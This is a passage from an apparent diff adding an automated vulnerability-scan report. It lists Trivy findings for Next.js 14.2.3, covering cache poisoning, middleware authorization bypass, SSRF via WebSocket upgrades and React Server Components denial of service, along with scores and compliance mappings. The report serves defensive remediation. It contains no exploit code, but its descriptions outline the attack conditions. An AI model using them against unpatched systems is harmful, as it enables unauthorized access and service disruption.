could coerce Next.js to cache a route that is meant to not be cached and send a `Cache-Control: s-maxage=1, stale-while-revalidate` header which some upstream CDNs may cache as well. To be potentially affected all of the following must apply: 1. Next.js between 13.5.1 and 14.2.9, 2. Using pages router, & 3. Using non-dynamic server-side rendered routes e.g. `pages/dashboard.tsx` not `pages/blog/[slug].tsx`. This vulnerability was resolved in Next.js v13.5.7, v14.2.10, and later. We recommend upgrading regardless of whether you can reproduce the issue or not. There are no official or recommended workarounds for this issue, we recommend that users patch to a safe version.", + "remediation": "https://avd.aquasec.com/nvd/cve-2024-46982", + "references": [], + "tags": [ + "vulnerability", + "pkg:next@14.2.3" + ], + "risk": { + "cwe": [ + "CWE-639" + ] + }, + "raw": { + "VulnerabilityID": "CVE-2024-46982", + "VendorIDs": [ + "GHSA-gp8f-8m3g-qvj9" + ], + "PkgID": "next@14.2.3", + "PkgName": "next", + "PkgIdentifier": { + "PURL": "pkg:npm/next@14.2.3", + "UID": "494c23d2c970c8b" + }, + "InstalledVersion": "14.2.3", + "FixedVersion": "13.5.7, 14.2.10", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2024-46982", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:8ae6ee9f6abad6c253892c7eafdf3857ac92ffe851cb6c9568fa46323bbc7084", + "Title": "Next.js Cache Poisoning", + "Description": "Next.js is a React framework for building full-stack web applications. By sending a crafted HTTP request, it is possible to poison the cache of a non-dynamic server-side rendered route in the pages router (this does not affect the app router). When this crafted request is sent it could coerce Next.js to cache a route that is meant to not be cached and send a `Cache-Control: s-maxage=1, stale-while-revalidate` header which some upstream CDNs may cache as well. To be potentially affected all of the following must apply: 1. Next.js between 13.5.1 and 14.2.9, 2. Using pages router, & 3. Using non-dynamic server-side rendered routes e.g. `pages/dashboard.tsx` not `pages/blog/[slug].tsx`. This vulnerability was resolved in Next.js v13.5.7, v14.2.10, and later. We recommend upgrading regardless of whether you can reproduce the issue or not. There are no official or recommended workarounds for this issue, we recommend that users patch to a safe version.", + "Severity": "HIGH", + "CweIDs": [ + "CWE-639" + ], + "VendorSeverity": { + "ghsa": 3 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "V40Vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N", + "V3Score": 7.5, + "V40Score": 8.7 + } + }, + "References": [ + "https://github.com/vercel/next.js", + "https://github.com/vercel/next.js/commit/7ed7f125e07ef0517a331009ed7e32691ba403d3", + "https://github.com/vercel/next.js/commit/bd164d53af259c05f1ab434004bcfdd3837d7cda", + "https://github.com/vercel/next.js/security/advisories/GHSA-gp8f-8m3g-qvj9", + "https://nvd.nist.gov/vuln/detail/CVE-2024-46982" + ], + "PublishedDate": "2024-09-17T22:15:02.273Z", + "LastModifiedDate": "2025-09-10T15:46:05.173Z" + }, + "context": { + "sbom": { + "name": "next", + "version": "14.2.3", + "path": "/package-lock.json" + } + }, + "compliance": { + "owaspTop10_2021": [ + "A01:2021" + ], + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 69.12453333333335, + "epss": 0.49062, + "epss_percentile": 0.97812, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 7, + "epss_multiplier": 2.9624800000000002, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "ea84684553ce61ab", + "ruleId": "CVE-2024-51479", + "severity": "HIGH", + "tool": { + "name": "trivy", + "version": "unknown" + }, + "location": { + "path": "package-lock.json", + "startLine": 0 + }, + "message": "next.js: next: authorization bypass in Next.js", + "title": "CVE-2024-51479", + "description": "Next.js is a React framework for building full-stack web applications. In affected versions if a Next.js application is performing authorization in middleware based on pathname, it was possible for this authorization to be bypassed for pages directly under the application's root directory. For example: * [Not affected] `https://example.com/` * [Affected] `https://example.com/foo` * [Not affected] `https://example.com/foo/bar`. This issue is patched in Next.js `14.2.15` and later. If your Next.js application is hosted on Vercel, this vulnerability has been automatically mitigated, regardless of Next.js version. There are no official workarounds for this vulnerability.", + "remediation": "https://avd.aquasec.com/nvd/cve-2024-51479", + "references": [], + "tags": [ + "vulnerability", + "pkg:next@14.2.3" + ], + "risk": { + "cwe": [ + "CWE-285", + "CWE-863" + ] + }, + "raw": { + "VulnerabilityID": "CVE-2024-51479", + "VendorIDs": [ + "GHSA-7gfc-8cq8-jh5f" + ], + "PkgID": "next@14.2.3", + "PkgName": "next", + "PkgIdentifier": { + "PURL": "pkg:npm/next@14.2.3", + "UID": "494c23d2c970c8b" + }, + "InstalledVersion": "14.2.3", + "FixedVersion": "14.2.15", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2024-51479", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:ffe1fe8cd242722c48ed9d1d21d64c4678d5fece8d35a42fb15072938ea11c55", + "Title": "next.js: next: authorization bypass in Next.js", + "Description": "Next.js is a React framework for building full-stack web applications. In affected versions if a Next.js application is performing authorization in middleware based on pathname, it was possible for this authorization to be bypassed for pages directly under the application's root directory. For example: * [Not affected] `https://example.com/` * [Affected] `https://example.com/foo` * [Not affected] `https://example.com/foo/bar`. This issue is patched in Next.js `14.2.15` and later. If your Next.js application is hosted on Vercel, this vulnerability has been automatically mitigated, regardless of Next.js version. There are no official workarounds for this vulnerability.", + "Severity": "HIGH", + "CweIDs": [ + "CWE-285", + "CWE-863" + ], + "VendorSeverity": { + "ghsa": 3, + "redhat": 2 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "V3Score": 7.5 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "V3Score": 7.5 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2024-51479", + "https://github.com/vercel/next.js", + "https://github.com/vercel/next.js/commit/1c8234eb20bc8afd396b89999a00f06b61d72d7b", + "https://github.com/vercel/next.js/releases/tag/v14.2.15", + "https://github.com/vercel/next.js/security/advisories/GHSA-7gfc-8cq8-jh5f", + "https://nvd.nist.gov/vuln/detail/CVE-2024-51479", + "https://www.cve.org/CVERecord?id=CVE-2024-51479" + ], + "PublishedDate": "2024-12-17T19:15:06.697Z", + "LastModifiedDate": "2025-09-10T15:48:08.253Z" + }, + "context": { + "sbom": { + "name": "next", + "version": "14.2.3", + "path": "/package-lock.json" + } + }, + "compliance": { + "owaspTop10_2021": [ + "A01:2021" + ], + "cweTop25_2024": [ + { + "id": "CWE-863", + "rank": 24, + "category": "Authorization" + } + ], + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 96.60839999999999, + "epss": 0.78509, + "epss_percentile": 0.99056, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 7, + "epss_multiplier": 4.140359999999999, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "668e2a15050688ec", + "ruleId": "CVE-2026-44573", + "severity": "HIGH", + "tool": { + "name": "trivy", + "version": "unknown" + }, + "location": { + "path": "package-lock.json", + "startLine": 0 + }, + "message": "Next.js has a Middleware / Proxy bypass in Pages Router applications using i18n", + "title": "CVE-2026-44573", + "description": "Next.js is a React framework for building full-stack web applications. From 12.2.0 to before 15.5.16 and 16.2.5, Applications using the Pages Router with i18n configured and middleware/proxy-based authorization can allow unauthorized access to protected page data through locale-less /_next/data//.json requests. In affected configurations, middleware does not run for the unprefixed data route, allowing an attacker to retrieve SSR JSON for protected pages without passing the intended authorization checks. This vulnerability is fixed in 15.5.16 and 16.2.5.", + "remediation": "https://avd.aquasec.com/nvd/cve-2026-44573", + "references": [], + "tags": [ + "vulnerability", + "pkg:next@14.2.3" + ], + "risk": { + "cwe": [ + "CWE-863" + ] + }, + "raw": { + "VulnerabilityID": "CVE-2026-44573", + "VendorIDs": [ + "GHSA-36qx-fr4f-26g5" + ], + "PkgID": "next@14.2.3", + "PkgName": "next", + "PkgIdentifier": { + "PURL": "pkg:npm/next@14.2.3", + "UID": "494c23d2c970c8b" + }, + "InstalledVersion": "14.2.3", + "FixedVersion": "15.5.16, 16.2.5", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-44573", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:bd9906f4d5b485ab232b2dbc5a0fba6ec53cd6439edf9b78c2790429b6f3bb2d", + "Title": "Next.js has a Middleware / Proxy bypass in Pages Router applications using i18n", + "Description": "Next.js is a React framework for building full-stack web applications. From 12.2.0 to before 15.5.16 and 16.2.5, Applications using the Pages Router with i18n configured and middleware/proxy-based authorization can allow unauthorized access to protected page data through locale-less /_next/data//.json requests. In affected configurations, middleware does not run for the unprefixed data route, allowing an attacker to retrieve SSR JSON for protected pages without passing the intended authorization checks. This vulnerability is fixed in 15.5.16 and 16.2.5.", + "Severity": "HIGH", + "CweIDs": [ + "CWE-863" + ], + "VendorSeverity": { + "ghsa": 3 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "V3Score": 7.5 + } + }, + "References": [ + "https://github.com/vercel/next.js", + "https://github.com/vercel/next.js/releases/tag/v15.5.16", + "https://github.com/vercel/next.js/releases/tag/v16.2.5", + "https://github.com/vercel/next.js/security/advisories/GHSA-36qx-fr4f-26g5", + "https://nvd.nist.gov/vuln/detail/CVE-2026-44573" + ], + "PublishedDate": "2026-05-13T17:16:22.627Z", + "LastModifiedDate": "2026-05-14T12:24:22.91Z" + }, + "context": { + "sbom": { + "name": "next", + "version": "14.2.3", + "path": "/package-lock.json" + } + }, + "compliance": { + "owaspTop10_2021": [ + "A01:2021" + ], + "cweTop25_2024": [ + { + "id": "CWE-863", + "rank": 24, + "category": "Authorization" + } + ], + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 23.381866666666667, + "epss": 0.00052, + "epss_percentile": 0.1631, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 7, + "epss_multiplier": 1.00208, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "6cbf7b1b47550df1", + "ruleId": "CVE-2026-44578", + "severity": "HIGH", + "tool": { + "name": "trivy", + "version": "unknown" + }, + "location": { + "path": "package-lock.json", + "startLine": 0 + }, + "message": "Next.js vulnerable to server-side request forgery in applications using WebSocket upgrades", + "title": "CVE-2026-44578", + "description": "Next.js is a React framework for building full-stack web applications. From 13.4.13 to before 15.5.16 and 16.2.5, self-hosted applications using the built-in Node.js server can be vulnerable to server-side request forgery through crafted WebSocket upgrade requests. An attacker can cause the server to proxy requests to arbitrary internal or external destinations, which may expose internal services or cloud metadata endpoints. Vercel-hosted deployments are not affected. This vulnerability is fixed in 15.5.16 and 16.2.5.", + "remediation": "https://avd.aquasec.com/nvd/cve-2026-44578", + "references": [], + "tags": [ + "vulnerability", + "pkg:next@14.2.3" + ], + "risk": { + "cwe": [ + "CWE-918" + ] + }, + "raw": { + "VulnerabilityID": "CVE-2026-44578", + "VendorIDs": [ + "GHSA-c4j6-fc7j-m34r" + ], + "PkgID": "next@14.2.3", + "PkgName": "next", + "PkgIdentifier": { + "PURL": "pkg:npm/next@14.2.3", + "UID": "494c23d2c970c8b" + }, + "InstalledVersion": "14.2.3", + "FixedVersion": "15.5.16, 16.2.5", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-44578", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:4b00929401561b3189dd6335cdbb89b9957345f4d80a9420d54dbe8defe083a4", + "Title": "Next.js vulnerable to server-side request forgery in applications using WebSocket upgrades", + "Description": "Next.js is a React framework for building full-stack web applications. From 13.4.13 to before 15.5.16 and 16.2.5, self-hosted applications using the built-in Node.js server can be vulnerable to server-side request forgery through crafted WebSocket upgrade requests. An attacker can cause the server to proxy requests to arbitrary internal or external destinations, which may expose internal services or cloud metadata endpoints. Vercel-hosted deployments are not affected. This vulnerability is fixed in 15.5.16 and 16.2.5.", + "Severity": "HIGH", + "CweIDs": [ + "CWE-918" + ], + "VendorSeverity": { + "ghsa": 3 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N", + "V3Score": 8.6 + } + }, + "References": [ + "https://github.com/vercel/next.js", + "https://github.com/vercel/next.js/releases/tag/v15.5.16", + "https://github.com/vercel/next.js/releases/tag/v16.2.5", + "https://github.com/vercel/next.js/security/advisories/GHSA-c4j6-fc7j-m34r", + "https://nvd.nist.gov/vuln/detail/CVE-2026-44578" + ], + "PublishedDate": "2026-05-13T18:16:17.99Z", + "LastModifiedDate": "2026-05-14T18:34:38.53Z" + }, + "context": { + "sbom": { + "name": "next", + "version": "14.2.3", + "path": "/package-lock.json" + } + }, + "compliance": { + "owaspTop10_2021": [ + "A10:2021" + ], + "cweTop25_2024": [ + { + "id": "CWE-918", + "rank": 19, + "category": "SSRF" + } + ], + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 27.510933333333334, + "epss": 0.04476, + "epss_percentile": 0.89216, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 7, + "epss_multiplier": 1.17904, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "091bd6d2c4384d47", + "ruleId": "GHSA-5j59-xgg2-r9c4", + "severity": "HIGH", + "tool": { + "name": "trivy", + "version": "unknown" + }, + "location": { + "path": "package-lock.json", + "startLine": 0 + }, + "message": "Next has a Denial of Service with Server Components - Incomplete Fix Follow-Up", + "title": "GHSA-5j59-xgg2-r9c4", + "description": "It was discovered that the fix for [CVE-2025-55184](https://github.com/advisories/GHSA-2m3v-v2m8-q956) in React Server Components was incomplete and did not fully mitigate denial-of-service conditions across all payload types. As a result, certain crafted inputs could still trigger excessive resource consumption. \n\nThis vulnerability affects React versions 19.0.2, 19.1.3, and 19.2.2, as well as frameworks that bundle or depend on these versions, including Next.js 13.x, 14.x, 15.x, and 16.x when using the App Router. The issue is tracked upstream as [CVE-2025-67779](https://www.cve.org/CVERecord?id=CVE-2025-67779).\n\nA malicious actor can send a specially crafted HTTP request to a Server Function endpoint that, when deserialized, causes the React Server Components runtime to enter an infinite loop. This can lead to sustained CPU consumption and cause the affected server process to become unresponsive, resulting in a denial-of-service condition in unpatched environments.", + "remediation": "https://github.com/advisories/GHSA-5j59-xgg2-r9c4", + "references": [], + "tags": [ + "vulnerability", + "pkg:next@14.2.3" + ], + "raw": { + "VulnerabilityID": "GHSA-5j59-xgg2-r9c4", + "PkgID": "next@14.2.3", + "PkgName": "next", + "PkgIdentifier": { + "PURL": "pkg:npm/next@14.2.3", + "UID": "494c23d2c970c8b" + }, + "InstalledVersion": "14.2.3", + "FixedVersion": "14.2.35, 15.0.7, 15.1.11, 15.2.8, 15.3.8, 15.4.10, 15.5.9, 15.6.0-canary.60, 16.0.10, 16.1.0-canary.19", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://github.com/advisories/GHSA-5j59-xgg2-r9c4", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:c465b7761effe6b822ac2a802014aa01002d62640427a73b62a2a571e081fe24", + "Title": "Next has a Denial of Service with Server Components - Incomplete Fix Follow-Up", + "Description": "It was discovered that the fix for [CVE-2025-55184](https://github.com/advisories/GHSA-2m3v-v2m8-q956) in React Server Components was incomplete and did not fully mitigate denial-of-service conditions across all payload types. As a result, certain crafted inputs could still trigger excessive resource consumption. \n\nThis vulnerability affects React versions 19.0.2, 19.1.3, and 19.2.2, as well as frameworks that bundle or depend on these versions, including Next.js 13.x, 14.x, 15.x, and 16.x when using the App Router. The issue is tracked upstream as [CVE-2025-67779](https://www.cve.org/CVERecord?id=CVE-2025-67779).\n\nA malicious actor can send a specially crafted HTTP request to a Server Function endpoint that, when deserialized, causes the React Server Components runtime to enter an infinite loop. This can lead to sustained CPU consumption and cause the affected server process to become unresponsive, resulting in a denial-of-service condition in unpatched environments.", + "Severity": "HIGH", + "VendorSeverity": { + "ghsa": 3 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "V3Score": 7.5 + } + }, + "References": [ + "https://github.com/vercel/next.js", + "https://github.com/vercel/next.js/security/advisories/GHSA-5j59-xgg2-r9c4", + "https://nextjs.org/blog/security-update-2025-12-11", + "https://nvd.nist.gov/vuln/detail/CVE-2025-67779", + "https://react.dev/blog/2025/12/11/denial-of-service-and-source-code-exposure-in-react-server-components", + "https://www.cve.org/CVERecord?id=CVE-2025-55184", + "https://www.facebook.com/security/advisories/cve-2025-67779" + ], + "PublishedDate": "2025-12-12T17:21:57Z", + "LastModifiedDate": "2026-01-15T21:55:04Z" + }, + "context": { + "sbom": { + "name": "next", + "version": "14.2.3", + "path": "/package-lock.json" + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 23.333333333333336, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 7, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "2dd16d93f72241ba", + "ruleId": "GHSA-8h8q-6873-q5fj", + "severity": "HIGH", + "tool": { + "name": "trivy", + "version": "unknown" + }, + "location": { + "path": "package-lock.json", + "startLine": 0 + }, + "message": "Next.js Vulnerable to Denial of Service with Server Components", + "title": "GHSA-8h8q-6873-q5fj", + "description": "A vulnerability affects certain React Server Components packages for versions 19.x and frameworks that use the affected packages, including Next.js 13.x, 14.x, 15.x, and 16.x using the App Router. The issue is tracked upstream as [CVE-2026-23870](https://github.com/facebook/react/security/advisories/GHSA-rv78-f8rc-xrxh). \n\nA specially crafted HTTP request can be sent to any App Router Server Function endpoint that, when deserialized, may trigger excessive CPU usage. This can result in denial of service in unpatched environments.", + "remediation": "https://github.com/advisories/GHSA-8h8q-6873-q5fj", + "references": [], + "tags": [ + "vulnerability", + "pkg:next@14.2.3" + ], + "raw": { + "VulnerabilityID": "GHSA-8h8q-6873-q5fj", + "PkgID": "next@14.2.3", + "PkgName": "next", + "PkgIdentifier": { + "PURL": "pkg:npm/next@14.2.3", + "UID": "494c23d2c970c8b" + }, + "InstalledVersion": "14.2.3", + "FixedVersion": "15.5.16, 16.2.5", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://github.com/advisories/GHSA-8h8q-6873-q5fj", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:92e1aa37bcc2db1c15708088885b76cf9ca9d3d8c1fc2283d064ff5d037c3529", + "Title": "Next.js Vulnerable to Denial of Service with Server Components", + "Description": "A vulnerability affects certain React Server Components packages for versions 19.x and frameworks that use the affected packages, including Next.js 13.x, 14.x, 15.x, and 16.x using the App Router. The issue is tracked upstream as [CVE-2026-23870](https://github.com/facebook/react/security/advisories/GHSA-rv78-f8rc-xrxh). \n\nA specially crafted HTTP request can be sent to any App Router Server Function endpoint that, when deserialized, may trigger excessive CPU usage. This can result in denial of service in unpatched environments.", + "Severity": "HIGH", + "VendorSeverity": { + "ghsa": 3 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "V3Score": 7.5 + } + }, + "References": [ + "https://github.com/facebook/react/security/advisories/GHSA-rv78-f8rc-xrxh", + "https://github.com/vercel/next.js", + "https://github.com/vercel/next.js/security/advisories/GHSA-8h8q-6873-q5fj", + "https://github.com/vitejs/vite-plugin-react/security/advisories/GHSA-w94c-4vhp-22gx", + "https://nvd.nist.gov/vuln/detail/CVE-2026-23870" + ], + "PublishedDate": "2026-05-11T14:50:27Z", + "LastModifiedDate": "2026-05-11T14:50:27Z" + }, + "context": { + "sbom": { + "name": "next", + "version": "14.2.3", + "path": "/package-lock.json" + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 23.333333333333336, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 7, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "3cc6d1d18936ff7b", + "ruleId": "GHSA-h25m-26qc-wcjf", + "severity": "HIGH", + "tool": { + "name": "trivy", + "version": "unknown" + }, + "location": { + "path": "package-lock.json", + "startLine": 0 + }, + "message": "Next.js HTTP request deserialization can lead to DoS when using insecure React Server Components", + "title": "GHSA-h25m-26qc-wcjf", + "description": "A vulnerability affects certain React Server Components packages for versions 19.0.x, 19.1.x, and 19.2.x and frameworks that use the affected packages, including Next.js 13.x, 14.x, 15.x, and 16.x using the App Router. The issue is tracked upstream as 